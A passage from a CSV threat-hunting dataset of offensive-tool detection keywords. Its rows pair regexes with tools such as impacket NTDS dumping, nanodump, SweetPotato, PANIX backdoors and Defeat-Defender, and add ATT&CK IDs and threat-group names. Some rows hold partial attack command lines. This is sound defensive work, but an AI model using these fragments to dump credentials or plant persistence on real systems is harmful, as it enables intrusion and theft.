Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3421" "* stuxnet-detect.nse*",".{0,1000}\sstuxnet\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3422" "* subbrute.py*",".{0,1000}\ssubbrute\.py.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","3423" "* subbrute.run(*",".{0,1000}\ssubbrute\.run\(.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","3424" "* submit_to_nemesis.py*",".{0,1000}\ssubmit_to_nemesis\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3425" "* submit_to_nemesis.sh*",".{0,1000}\ssubmit_to_nemesis\.sh.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3426" "* Successful authentication. Access and refresh tokens have been written to the global $apptokens variable. To use them with other GraphRunner modules use the Tokens flag *",".{0,1000}\sSuccessful\sauthentication\.\sAccess\sand\srefresh\stokens\shave\sbeen\swritten\sto\sthe\sglobal\s\$apptokens\svariable\.\sTo\suse\sthem\swith\sother\sGraphRunner\smodules\suse\sthe\sTokens\sflag\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","3427" "* Successfully hijacked KeePassXC.exe*",".{0,1000}\sSuccessfully\shijacked\sKeePassXC\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","3428" "* --sudoers-backdoor*",".{0,1000}\s\-\-sudoers\-backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - 
T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","3429" "* supermicro-ipmi-conf.nse*",".{0,1000}\ssupermicro\-ipmi\-conf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3430" "* Supershell.tar.gz*",".{0,1000}\sSupershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","3431" "* -sV --script vulners *",".{0,1000}\s\-sV\s\-\-script\svulners\s.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Discovery","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3433" "* svn-brute.nse*",".{0,1000}\ssvn\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3434" "* SW2_HashSyscall*",".{0,1000}\sSW2_HashSyscall.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","3435" "* SweetPotato by @_EthicalChaos*",".{0,1000}\sSweetPotato\sby\s\@_EthicalChaos.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - 
Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","0","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","3436" "* Sweetpotato.exe*",".{0,1000}\sSweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","3437" "* --syscalls GetSyscallStub*",".{0,1000}\s\-\-syscalls\sGetSyscallStub.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3438" "* -syscalls -sleep=*.exe*",".{0,1000}\s\-syscalls\s\-sleep\=.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3439" "* --syscalls SysWhispers3*",".{0,1000}\s\-\-syscalls\sSysWhispers3.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3440" "* -system * -ntds *ntds.dit*",".{0,1000}\s\-system\s.{0,1000}\s\-ntds\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","3441" "* System account. 
On victim computer should be installed AD CS*",".{0,1000}\sSystem\saccount\.\sOn\svictim\scomputer\sshould\sbe\sinstalled\sAD\sCS.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","3442" "* -system SYSTEM -ntds NTDS.dit LOCAL*",".{0,1000}\s\-system\sSYSTEM\s\-ntds\sNTDS\.dit\sLOCAL.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","3443" "* -system SYSTEM -ntds NTDS.dit -outputfile*",".{0,1000}\s\-system\sSYSTEM\s\-ntds\sNTDS\.dit\s\-outputfile.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","3444" "* --syswhispers --jump*",".{0,1000}\s\-\-syswhispers\s\-\-jump.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3445" "* SysWhispers*",".{0,1000}\sSysWhispers.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","3446" "* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*",".{0,1000}\s\-t\s.{0,1000}https\:\/\/autodiscover\..{0,1000}\/autodiscover\/autodiscover\.xml.{0,1000}autodiscover.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","3447" "* -t 127.0.0.1 -p 1337 *",".{0,1000}\s\-t\s127\.0\.0\.1\s\-p\s1337\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","0","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","3448" "* -t 20 -ipl iplist.txt -p32 *",".{0,1000}\s\-t\s20\s\-ipl\siplist\.txt\s\-p32\s.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - 
T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","3449" "* -t BindShell -p *pwned\pipe\spoolss*",".{0,1000}\s\-t\sBindShell\s\-p\s.{0,1000}pwned\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","3450" "* -t C2concealer *",".{0,1000}\s\-t\sC2concealer\s.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","3451" "* -t CreateProcessAsUserW -p *pwned\pipe\spoolss* -e *.exe*",".{0,1000}\s\-t\sCreateProcessAsUserW\s\-p\s.{0,1000}pwned\\pipe\\spoolss.{0,1000}\s\-e\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","3452" "* -t dcsync://* -*",".{0,1000}\s\-t\sdcsync\:\/\/.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3453" "* -t donut *",".{0,1000}\s\-t\sdonut\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3454" "* -t pe2sh*",".{0,1000}\s\-t\spe2sh.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3455" "* -t schtaskbackdoor *",".{0,1000}\s\-t\sschtaskbackdoor\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","3456" "* T:U- odusN*",".{0,1000}\sT\:U\-\sodusN.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","3457" "* t2w.py*",".{0,1000}\st2w\.py.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","3458" "* -Target * -AllDomain *",".{0,1000}\s\-Target\s.{0,1000}\s\-AllDomain\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3462" "* -Target * -InitialGrooms 
*",".{0,1000}\s\-Target\s.{0,1000}\s\-InitialGrooms\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3463" "* -Target * -Shellcode *",".{0,1000}\s\-Target\s.{0,1000}\s\-Shellcode\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3464" "* --target=* --payload=*cmd.exe /c*",".{0,1000}\s\-\-target\=.{0,1000}\s\-\-payload\=.{0,1000}cmd\.exe\s\/c.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - 
TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","3465" "* -target-domain * -outputfile * -no-pass*",".{0,1000}\s\-target\-domain\s.{0,1000}\s\-outputfile\s.{0,1000}\s\-no\-pass.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral 